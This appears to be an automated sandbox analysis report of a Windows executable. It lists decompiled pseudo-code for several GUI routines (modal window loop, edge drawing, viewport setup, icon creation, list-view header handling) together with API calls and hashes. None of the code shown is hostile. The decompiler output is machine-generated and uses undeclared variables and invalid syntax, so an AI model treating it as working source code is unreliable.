			E00452234(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t50;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t88;
				intOrPtr _t120;
				void* _t122;
				void* _t125;
				void* _t126;
				intOrPtr _t127;

				_t123 = __esi;
				_t122 = __edi;
				_t125 = _t126;
				_t127 = _t126 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t125);
				_push(0x4524c4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				E004343D4();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2ec) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t50 =  *0x491070; // 0x41d530
					E00406548(_t50,  &_v36);
					E0040A158(_v36, 1);
					E00403DA8();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000008;
				_v32 = GetActiveWindow();
				_t58 =  *0x476b4c; // 0x0
				_v20 = _t58;
				_t59 =  *0x492c08; // 0x241094c
				_t60 =  *0x492c08; // 0x241094c
				E00414238( *((intOrPtr*)(_t60 + 0x7c)),  *((intOrPtr*)(_t59 + 0x78)), 0);
				_t63 =  *0x492c08; // 0x241094c
				 *((intOrPtr*)(_t63 + 0x78)) = _v8;
				_t64 =  *0x492c08; // 0x241094c
				_v22 =  *((intOrPtr*)(_t64 + 0x44));
				_t66 =  *0x492c08; // 0x241094c
				E0045369C(_t66,  *((intOrPtr*)(_t59 + 0x78)), 0);
				_t68 =  *0x492c08; // 0x241094c
				_v28 =  *((intOrPtr*)(_t68 + 0x48));
				_v16 = E0044C628(0, 0x492c04, _t122, _t123);
				_push(_t125);
				_push(0x4524a4);
				_push( *[fs:edx]);
				 *[fs:edx] = _t127;
				E00452184(_v8);
				_push(_t125);
				_push(0x452403);
				_push( *[fs:edx]);
				 *[fs:edx] = _t127;
				SendMessageA(E0043C1F4(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					E004553D4( *0x492c04, _t122, _t123);
					if( *((char*)( *0x492c04 + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E004520E4(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
					_t83 =  *((intOrPtr*)(_v8 + 0x24c));
				} while (_t83 == 0);
				_v12 = _t83;
				SendMessageA(E0043C1F4(_v8), 0xb001, 0, 0);
				_t88 = E0043C1F4(_v8);
				if(_t88 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t120);
				 *[fs:eax] = _t120;
				_push(0x45240a);
				return E0045217C();
			}

0x00452234
0x00452234
0x00452235
0x00452237
0x0045223a
0x0045223b
0x0045223e
0x00452241
0x0045224b
0x0045224c
0x00452251
0x00452254
0x00452257
0x00452263
0x0045228c
0x00452291
0x004522a0
0x004522a5
0x004522a5
0x004522b1
0x004522bf
0x004522bf
0x004522c4
0x004522cc
0x004522d8
0x004522db
0x004522e0
0x004522e3
0x004522eb
0x004522f5
0x004522fa
0x00452302
0x00452305
0x0045230e
0x00452314
0x00452319
0x0045231e
0x00452326
0x00452330
0x00452335
0x00452336
0x0045233b
0x0045233e
0x00452344
0x0045234b
0x0045234c
0x00452351
0x00452354
0x00452369
0x00452373
0x00452379
0x0045237b
0x00452389
0x004523a4
0x004523a9
0x004523a9
0x0045238b
0x0045238e
0x0045238e
0x004523b1
0x004523b7
0x004523bb
0x004523d0
0x004523d8
0x004523e6
0x004523ea
0x004523ea
0x004523ef
0x004523f2
0x004523f5
0x00452402

APIs

GetCapture.USER32 ref: 004522AA
GetCapture.USER32 ref: 004522B9
SendMessageA.USER32 ref: 004522BF
ReleaseCapture.USER32(00000000,004524C4), ref: 004522C4
GetActiveWindow.USER32 ref: 004522D3
SendMessageA.USER32 ref: 00452369
SendMessageA.USER32 ref: 004523D0
GetActiveWindow.USER32 ref: 004523DF

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID:
API String ID: 862346643-0
Opcode ID: e02ba57b4dad0587dab1b0976f2b4cbb701eef1c5534605c4be55da5e4fc5d9a
Instruction ID: 2d5935f5de0abf565ba2167de1f7639af11b1845c3466f7d6f9300908871c47e
Opcode Fuzzy Hash: e02ba57b4dad0587dab1b0976f2b4cbb701eef1c5534605c4be55da5e4fc5d9a
Instruction Fuzzy Hash: 6E510134A00244EFDB10EF6AC985B5D77F5AF49704F1580BAF804AB3A2D7B8AD44DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0043A2D0, Relevance: 12.1, APIs: 8, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043A2D0(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				signed int _t54;
				intOrPtr _t59;
				int _t61;
				void* _t63;
				void* _t66;
				void* _t82;
				int _t98;
				struct HDC__* _t99;

				_t99 = __edx;
				_t82 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
				_v16 = SaveDC(__edx);
				E004344B0(__edx, _a4, __ecx);
				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
				_t98 = 0;
				_v12 = 0;
				if((GetWindowLongA(E0043C1F4(_t82), 0xffffffec) & 0x00000002) == 0) {
					_t54 = GetWindowLongA(E0043C1F4(_t82), 0xfffffff0);
					__eflags = _t54 & 0x00800000;
					if((_t54 & 0x00800000) != 0) {
						_v12 = 3;
						_t98 = 0xa00f;
					}
				} else {
					_v12 = 0xa;
					_t98 = 0x200f;
				}
				if(_t98 != 0) {
					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
					DrawEdge(_t99,  &_v36, _v12, _t98);
					E004344B0(_t99, _v36.top, _v36.left);
					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
				}
				E00436D28(_t82, _t99, 0x14, 0);
				E00436D28(_t82, _t99, 0xf, 0);
				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
				if(_t59 == 0) {
					L12:
					_t61 = RestoreDC(_t99, _v16);
					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
					return _t61;
				} else {
					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
					if(_t63 < 0) {
						goto L12;
					}
					_v20 = _t63 + 1;
					_v8 = 0;
					do {
						_t66 = E004141BC( *((intOrPtr*)(_t82 + 0x19c)), _v8);
						_t107 =  *((char*)(_t66 + 0x57));
						if( *((char*)(_t66 + 0x57)) != 0) {
							E0043A2D0(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
						}
						_v8 = _v8 + 1;
						_t36 =  &_v20;
						 *_t36 = _v20 - 1;
					} while ( *_t36 != 0);
					goto L12;
				}
			}

0x0043a2db
0x0043a2dd
0x0043a2df
0x0043a2eb
0x0043a2f5
0x0043a307
0x0043a30c
0x0043a310
0x0043a325
0x0043a33f
0x0043a344
0x0043a349
0x0043a34b
0x0043a352
0x0043a352
0x0043a327
0x0043a327
0x0043a32e
0x0043a32e
0x0043a359
0x0043a36b
0x0043a37a
0x0043a387
0x0043a39f
0x0043a39f
0x0043a3af
0x0043a3bf
0x0043a3c4
0x0043a3cc
0x0043a40b
0x0043a410
0x0043a415
0x0043a421
0x0043a3ce
0x0043a3d1
0x0043a3d4
0x00000000
0x00000000
0x0043a3d7
0x0043a3da
0x0043a3e1
0x0043a3ea
0x0043a3ef
0x0043a3f3
0x0043a3fe
0x0043a3fe
0x0043a403
0x0043a406
0x0043a406
0x0043a406
0x00000000
0x0043a3e1

APIs

SaveDC.GDI32 ref: 0043A2E6

Part of subcall function 004344B0: GetWindowOrgEx.GDI32(?), ref: 004344BE
Part of subcall function 004344B0: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 004344D4

IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043A307
GetWindowLongA.USER32 ref: 0043A31D
GetWindowLongA.USER32 ref: 0043A33F
SetRect.USER32 ref: 0043A36B
DrawEdge.USER32(?,?,?,00000000), ref: 0043A37A
IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 0043A39F
RestoreDC.GDI32(?,?), ref: 0043A410

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
String ID:
API String ID: 2976466617-0
Opcode ID: d0140c666f526f50ef5f8ab22513bbbefff9821a20b66eb539e7ba88df28bdfb
Instruction ID: b0e91f104902065cc9bfcf8ecfdf17777c6db61d89a12b26c50b8d396225d46e
Opcode Fuzzy Hash: d0140c666f526f50ef5f8ab22513bbbefff9821a20b66eb539e7ba88df28bdfb
Instruction Fuzzy Hash: 0B416371B041156BDB00DB99CC85F9FB7B8AF48304F10516AF905EB396DA7CDD018799

Uniqueness

Uniqueness Score: -1.00%

Function 0045CC10, Relevance: 12.1, APIs: 8, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045CC10(void* __eax, void* __edx, void* __edi, void* __esi) {
				char _v12;
				int _v24;
				int _v28;
				signed int _v48;
				signed int _v52;
				int _t53;
				int _t55;
				signed int _t60;
				signed int _t63;
				int _t82;
				int _t84;
				signed int _t89;
				signed int _t92;
				void* _t97;
				void* _t113;

				_t97 = __eax;
				if(__edx == 0) {
					E00412B58(0, _t113, 0, __edi, __esi);
					E00412B58(1,  &_v12, 1, __edi, __esi);
					SetMapMode(E00420704( *((intOrPtr*)(_t97 + 0x208))), 8);
					SetWindowOrgEx(E00420704( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
					_t53 = E004355BC(_t97);
					_t55 = E00435578(_t97);
					SetViewportExtEx(E00420704( *((intOrPtr*)(_t97 + 0x208))), _t55, _t53, 0);
					_t60 = E004355BC(_t97);
					_t63 = E00435578(_t97);
					return SetWindowExtEx(E00420704( *((intOrPtr*)(_t97 + 0x208))), _t63 * _v52, _t60 * _v48, 0);
				}
				E00412B58(E00412B58(E00435578(__eax), _t113, 0, __edi, __esi) | 0xffffffff,  &_v12, 1, __edi, __esi);
				SetMapMode(E00420704( *((intOrPtr*)(_t97 + 0x208))), 8);
				SetWindowOrgEx(E00420704( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
				_t82 = E004355BC(_t97);
				_t84 = E00435578(_t97);
				SetViewportExtEx(E00420704( *((intOrPtr*)(_t97 + 0x208))), _t84, _t82, 0);
				_t89 = E004355BC(_t97);
				_t92 = E00435578(_t97);
				return SetWindowExtEx(E00420704( *((intOrPtr*)(_t97 + 0x208))), _t92 * _v52, _t89 * _v48, 0);
			}

0x0045cc14
0x0045cc18
0x0045ccc8
0x0045ccdb
0x0045ccee
0x0045cd0b
0x0045cd14
0x0045cd1c
0x0045cd2e
0x0045cd37
0x0045cd43
0x00000000
0x0045cd59
0x0045cc3a
0x0045cc4d
0x0045cc6a
0x0045cc73
0x0045cc7b
0x0045cc8d
0x0045cc96
0x0045cca2
0x00000000

APIs

SetMapMode.GDI32(00000000,00000008), ref: 0045CC4D
SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CC6A
SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CC8D
SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CCB8
SetMapMode.GDI32(00000000,00000008), ref: 0045CCEE
SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 0045CD0B
SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CD2E
SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CD59

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ModeViewport
String ID:
API String ID: 3149394475-0
Opcode ID: 0ff7e3d1fa3f50bea65dacad6271d8db0617f1f3ffc2ebfa0db5a1b2333ce918
Instruction ID: a4bd5625d253891b6eb85d08422eaf7e19539b069885d5f5ed27a20a838ea9be
Opcode Fuzzy Hash: 0ff7e3d1fa3f50bea65dacad6271d8db0617f1f3ffc2ebfa0db5a1b2333ce918
Instruction Fuzzy Hash: 46312F607043016BD740FF7A8C86B4B269D6B48318F04593EB999DB297CA7DE8454729

Uniqueness

Uniqueness Score: -1.00%

Function 0042103C, Relevance: 12.1, APIs: 8, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E0042103C(void* __ebx) {
				intOrPtr _v8;
				char _v1000;
				char _v1004;
				char _v1032;
				signed int _v1034;
				short _v1036;
				void* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t45;
				intOrPtr _t52;
				void* _t54;
				void* _t55;

				_t54 = _t55;
				_v1036 = 0x300;
				_v1034 = 0x10;
				_t25 = E004029BC(_t24, 0x40,  &_v1032);
				_push(0);
				L00406EA4();
				_v8 = _t25;
				_push(_t54);
				_push(0x421139);
				_push( *[fs:eax]);
				 *[fs:eax] = _t55 + 0xfffffbf8;
				_push(0x68);
				_t27 = _v8;
				_push(_t27);
				L00406B8C();
				_t45 = _t27;
				if(_t45 >= 0x10) {
					_push( &_v1032);
					_push(8);
					_push(0);
					_push(_v8);
					L00406BCC();
					if(_v1004 != 0xc0c0c0) {
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
						_push(8);
						_push(_t45 - 8);
						_push(_v8);
						L00406BCC();
					} else {
						_push( &_v1004);
						_push(1);
						_push(_t45 - 8);
						_push(_v8);
						L00406BCC();
						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
						_push(7);
						_push(_t45 - 7);
						_push(_v8);
						L00406BCC();
						_push( &_v1000);
						_push(1);
						_push(7);
						_push(_v8);
						L00406BCC();
					}
				}
				_pop(_t52);
				 *[fs:eax] = _t52;
				_push(E00421140);
				_t29 = _v8;
				_push(_t29);
				_push(0);
				L00407114();
				return _t29;
			}

0x0042103d
0x00421046
0x0042104f
0x00421063
0x00421068
0x0042106a
0x0042106f
0x00421074
0x00421075
0x0042107a
0x0042107d
0x00421080
0x00421082
0x00421085
0x00421086
0x0042108b
0x00421090
0x0042109c
0x0042109d
0x0042109f
0x004210a4
0x004210a5
0x004210b4
0x00421110
0x00421111
0x00421116
0x0042111a
0x0042111b
0x004210b6
0x004210bc
0x004210bd
0x004210c4
0x004210c8
0x004210c9
0x004210dc
0x004210dd
0x004210e2
0x004210e6
0x004210e7
0x004210f2
0x004210f3
0x004210f5
0x004210fa
0x004210fb
0x004210fb
0x004210b4
0x00421122
0x00421125
0x00421128
0x0042112d
0x00421130
0x00421131
0x00421133
0x00421138

APIs

72E7AC50.USER32(00000000), ref: 0042106A
72E7AD70.GDI32(?,00000068,00000000,00421139,?,00000000), ref: 00421086
72E7AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,00421139,?,00000000), ref: 004210A5
72E7AEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,00421139,?,00000000), ref: 004210C9
72E7AEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,00421139), ref: 004210E7
72E7AEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 004210FB
72E7AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,00421139,?,00000000), ref: 0042111B
72E7B380.USER32(00000000,?,00421140,00421139,?,00000000), ref: 00421133

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: B380
String ID:
API String ID: 120756276-0
Opcode ID: 175b897e90c79142bf7d27bf80eb641bdcfa3a0205f4e550698412d9e580dc0c
Instruction ID: 1128953b8e5d6598885ed245dd4ee5d93dfe716b90322840084aa05605c4788b
Opcode Fuzzy Hash: 175b897e90c79142bf7d27bf80eb641bdcfa3a0205f4e550698412d9e580dc0c
Instruction Fuzzy Hash: AB2188F1A00218AADB10DB95CD81FAE77BCDB18704F5104A6F708F71C1D6796F548728

Uniqueness

Uniqueness Score: -1.00%

Function 0042162C, Relevance: 10.7, APIs: 7, Instructions: 166
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0042162C() {
				struct HINSTANCE__* _t145;
				long _t166;
				intOrPtr _t167;
				intOrPtr _t186;
				void* _t192;
				BYTE* _t193;
				BYTE* _t196;
				intOrPtr _t197;
				void* _t198;
				intOrPtr _t199;

				 *((intOrPtr*)(_t198 - 0x24)) = 0;
				 *((intOrPtr*)(_t198 - 0x20)) = E004214A0( *( *((intOrPtr*)(_t198 - 0x10)) + 2) & 0x0000ffff);
				_t192 =  *((intOrPtr*)(_t198 - 0xc)) - 1;
				if(_t192 > 0) {
					_t197 = 1;
					do {
						_t167 = E004214A0( *( *((intOrPtr*)(_t198 - 0x10)) + 2 + (_t197 + _t197) * 8) & 0x0000ffff);
						if(_t167 <=  *((intOrPtr*)(_t198 - 0x1c)) && _t167 >=  *((intOrPtr*)(_t198 - 0x20)) && E004214AC( *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8,  *((intOrPtr*)(_t198 - 0x10)) + (_t197 + _t197) * 8, _t198) != 0) {
							 *((intOrPtr*)(_t198 - 0x24)) = _t197;
							 *((intOrPtr*)(_t198 - 0x20)) = _t167;
						}
						_t197 = _t197 + 1;
						_t192 = _t192 - 1;
						_t204 = _t192;
					} while (_t192 != 0);
				}
				 *(_t198 - 0x40) =  *((intOrPtr*)(_t198 - 0x10)) + ( *((intOrPtr*)(_t198 - 0x24)) +  *((intOrPtr*)(_t198 - 0x24))) * 8;
				 *( *(_t198 + 8)) =  *( *(_t198 - 0x40)) & 0x000000ff;
				( *(_t198 + 8))[1] = ( *(_t198 - 0x40))[1] & 0x000000ff;
				 *((intOrPtr*)(_t198 - 0x2c)) = E004083C4(( *(_t198 - 0x40))[8], _t204);
				 *[fs:eax] = _t199;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 0x10))( *[fs:eax], 0x421813, _t198);
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))) + 8))();
				E004212E4( *((intOrPtr*)(_t198 - 0x2c)),  *((intOrPtr*)(_t198 - 0x2c)), _t198 - 0x38, _t198 - 0x34, _t192,  *((intOrPtr*)( *((intOrPtr*)(_t198 - 4)))), _t204,  *(_t198 + 8));
				GetObjectA( *(_t198 - 0x38), 0x18, _t198 - 0x70);
				GetObjectA( *(_t198 - 0x34), 0x18, _t198 - 0x58);
				_t166 =  *(_t198 - 0x64) *  *(_t198 - 0x68) * ( *(_t198 - 0x60) & 0x0000ffff);
				 *(_t198 - 0x3c) =  *(_t198 - 0x4c) *  *(_t198 - 0x50) * ( *(_t198 - 0x48) & 0x0000ffff);
				 *((intOrPtr*)(_t198 - 0x18)) =  *(_t198 - 0x3c) + _t166;
				 *(_t198 - 0x30) = E004083C4( *((intOrPtr*)(_t198 - 0x18)), _t204);
				_push(_t198);
				_push(0x4217f0);
				_push( *[fs:eax]);
				 *[fs:eax] = _t199;
				_t193 =  *(_t198 - 0x30);
				_t196 =  &(( *(_t198 - 0x30))[_t166]);
				GetBitmapBits( *(_t198 - 0x38), _t166, _t193);
				GetBitmapBits( *(_t198 - 0x34),  *(_t198 - 0x3c), _t196);
				DeleteObject( *(_t198 - 0x34));
				DeleteObject( *(_t198 - 0x38));
				_t145 =  *0x492714; // 0x400000
				 *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) = CreateIcon(_t145,  *( *(_t198 + 8)), ( *(_t198 + 8))[1],  *(_t198 - 0x48),  *(_t198 - 0x46), _t193, _t196);
				if( *((intOrPtr*)( *((intOrPtr*)(_t198 - 8)))) == 0) {
					E00420A54(_t166);
				}
				_pop(_t186);
				 *[fs:eax] = _t186;
				_push(E004217F7);
				return E00402774( *(_t198 - 0x30));
			}

0x0042162e
0x0042163d
0x00421643
0x00421646
0x00421648
0x0042164d
0x0042165e
0x00421663
0x0042168a
0x0042168d
0x0042168d
0x00421690
0x00421691
0x00421691
0x00421691
0x0042164d
0x0042169f
0x004216ab
0x004216b7
0x004216c5
0x004216d3
0x004216ed
0x00421700
0x0042170f
0x0042171e
0x0042172d
0x0042173d
0x0042174c
0x00421754
0x0042175f
0x00421764
0x00421765
0x0042176a
0x0042176d
0x00421770
0x00421776
0x0042177e
0x0042178c
0x00421795
0x0042179e
0x004217ba
0x004217c8
0x004217d0
0x004217d2
0x004217d2
0x004217d9
0x004217dc
0x004217df
0x004217ef

APIs

GetObjectA.GDI32(?,00000018,?), ref: 0042171E
GetObjectA.GDI32(?,00000018,?), ref: 0042172D
GetBitmapBits.GDI32(?,?,?), ref: 0042177E
GetBitmapBits.GDI32(?,?,?), ref: 0042178C
DeleteObject.GDI32(?), ref: 00421795
DeleteObject.GDI32(?), ref: 0042179E
CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 004217C0

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$BitmapBitsDelete$CreateIcon
String ID:
API String ID: 1030595962-0
Opcode ID: b6496f7ab096e94c06732ecd227add21863255d75ea2945ba1247e13822358e2
Instruction ID: 0d7ec777cfb284482c5f7389cf99185666adb597eb2ac4453440195fbf546e72
Opcode Fuzzy Hash: b6496f7ab096e94c06732ecd227add21863255d75ea2945ba1247e13822358e2
Instruction Fuzzy Hash: 46612671A00228AFCB00DFA9D881EAEBBF9FF58304B554466F804EB361D734AD51CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00471500, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 163
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00471500(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v28;
				void* _v32;
				struct tagPOINT _v40;
				void* _t55;
				void* _t56;
				signed char _t60;
				struct HWND__* _t61;
				void* _t64;
				void* _t66;
				struct HWND__* _t73;
				signed short _t80;
				void* _t89;
				int _t93;
				long _t106;
				intOrPtr* _t112;
				intOrPtr _t123;
				intOrPtr _t124;
				void* _t132;
				signed char* _t141;
				void* _t144;
				void* _t145;
				struct HWND__* _t148;
				void* _t152;

				_v16 = 0;
				_t144 = __edx;
				_t112 = __eax;
				_push(_t152);
				_push(0x4716ff);
				_push( *[fs:eax]);
				 *[fs:eax] = _t152 + 0xffffffdc;
				E0043A5A4(__eax, 0, __edx, __eflags);
				if(E00471730(_t112) == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t144 + 8)))) !=  *((intOrPtr*)(_t112 + 0x264))) {
					L22:
					_pop(_t123);
					 *[fs:eax] = _t123;
					_push(0x471706);
					return E00404348( &_v16);
				} else {
					_t124 =  *((intOrPtr*)(_t144 + 8));
					_t55 =  *((intOrPtr*)(_t124 + 8)) - 0xfffffec9;
					if(_t55 == 0) {
						 *((char*)(_t112 + 0x295)) = 1;
						goto L22;
					}
					_t56 = _t55 - 4;
					if(_t56 == 0) {
						_t57 = _t124;
						_t141 =  *(_t124 + 0x14);
						__eflags =  *_t141 & 0x00000001;
						if(( *_t141 & 0x00000001) != 0) {
							_t145 = E00473F50(_t112,  *((intOrPtr*)(_t57 + 0xc)));
							_t60 =  *(_t145 + 0x18);
							__eflags = _t60 - _t141[4];
							if(_t60 < _t141[4]) {
								_t61 =  *(_t145 + 0x14);
								__eflags = _t61;
								if(_t61 > 0) {
									__eflags = _t61 - _t141[4];
									if(_t61 <= _t141[4]) {
										_t141[4] = _t61;
									}
								}
							} else {
								_t141[4] = _t60;
							}
							E0046EC6C(_t145, _t141[4]);
						}
					} else {
						_t64 = _t56 - 2;
						if(_t64 == 0) {
							_t66 = E00473F50(_t112,  *((intOrPtr*)(_t124 + 0xc)));
							E0046EC6C(_t66, E00426C9C(E0043C1F4(_t112),  *((intOrPtr*)(_t124 + 0xc))));
							_t73 =  *((intOrPtr*)( *_t112 + 0x120))();
							__eflags = _t73;
							if(_t73 != 0) {
								 *((intOrPtr*)( *_t112 + 0x7c))();
							}
						} else {
							if(_t64 == 0x12c) {
								_push(E00407280(GetMessagePos()) & 0x0000ffff);
								_t80 = GetMessagePos();
								_pop(_t132);
								E004067C4(_t80 & 0x0000ffff,  &_v12, _t132);
								E004356B8(_t112,  &_v40,  &_v12);
								_push(_v40.y);
								_t148 = ChildWindowFromPoint(E0043C1F4(_t112), _v40.x);
								__eflags = _t148;
								if(_t148 != 0) {
									_t89 = E0043C1F4(_t112);
									__eflags = _t148 - _t89;
									if(_t148 != _t89) {
										E00404984( &_v16, 0x50);
										_t93 = E00404600(_v16);
										E00404984( &_v16, GetClassNameA(_t148, E004047F8(_v16), _t93));
										E00404744(_v16, "SysHeader32");
										if(__eflags == 0) {
											E004356B8(_t112,  &_v40,  &_v12);
											_v32 = _v40;
											_v28 = _v40.y;
											_t106 = SendMessageA(_t148, 0x1206, 1,  &_v32);
											__eflags = _t106;
											if(_t106 >= 0) {
												E00473F50(_t112, _v20);
												E004037D8(_t112, __eflags);
											}
										}
									}
								}
							}
						}
					}
					goto L22;
				}
			}

0x0047150b
0x0047150e
0x00471510
0x00471514
0x00471515
0x0047151a
0x0047151d
0x00471524
0x00471532
0x004716e9
0x004716eb
0x004716ee
0x004716f1
0x004716fe
0x00471549
0x00471549
0x00471551
0x00471556
0x004715b7
0x00000000
0x004715b7
0x00471558
0x0047155b
0x00471572
0x00471574
0x00471577
0x0047157a
0x0047158a
0x0047158c
0x0047158f
0x00471592
0x00471599
0x0047159c
0x0047159e
0x004715a0
0x004715a3
0x004715a5
0x004715a5
0x004715a3
0x00471594
0x00471594
0x00471594
0x004715ad
0x004715ad
0x0047155d
0x0047155d
0x00471560
0x004715ca
0x004715e4
0x004715f1
0x004715f7
0x004715f9
0x00471603
0x00471603
0x00471562
0x00471567
0x00471618
0x00471619
0x00471624
0x00471625
0x00471632
0x00471637
0x0047164a
0x0047164c
0x0047164e
0x00471656
0x0047165b
0x0047165d
0x0047166b
0x00471673
0x0047168d
0x0047169a
0x0047169f
0x004716a9
0x004716b1
0x004716b7
